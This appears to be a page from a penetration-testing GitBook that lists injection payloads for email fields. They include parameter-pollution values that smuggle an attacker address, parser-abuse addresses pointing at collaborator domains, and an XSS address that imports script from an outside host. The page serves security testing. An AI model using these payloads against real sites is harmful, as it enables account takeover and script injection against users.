Email injections

Emails injection: XSS, SQLi, SSTI, etc.

ko-fiarrow-up-right

circle-check
user[email][]=valid@email.com&user[email][]=attacker@email.com

JSON

{"email":"mymail@b.com"}

Try:

{"email":["mymail@b.com", "attacker@x.com"]}
{"email":"mymail@b.com", "email":"attacker@x.com"}
email=attacker@x.com

Punnycode

Check Email Registration

Registration Formchevron-right

Parser Abuse - Domain confusion

oastify.com!collab\@example.com
collab%psres.net(@example.com

XSS

XSS in an email address is underrated. (email is rarely sanitized by companies). Use catch-all and then you can also verify your account (if required).

"><img/src/onerror=import('//domain/')>"@yourdomain.com

XSSchevron-right

SSTI

SSRF

CRLF

CRLF Injectionchevron-rightPassword Resetchevron-right

Register or reset password

SQL Injection

SQL Injectionchevron-right

Command Injection

Command Injectionchevron-right

Open Redirection

Bypass Access Control

HTML injection - Subscription form

Resources

Interesting Books

Interesting Bookschevron-right
circle-info

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

ko-fiarrow-up-right

buymeacoffeearrow-up-right

Last updated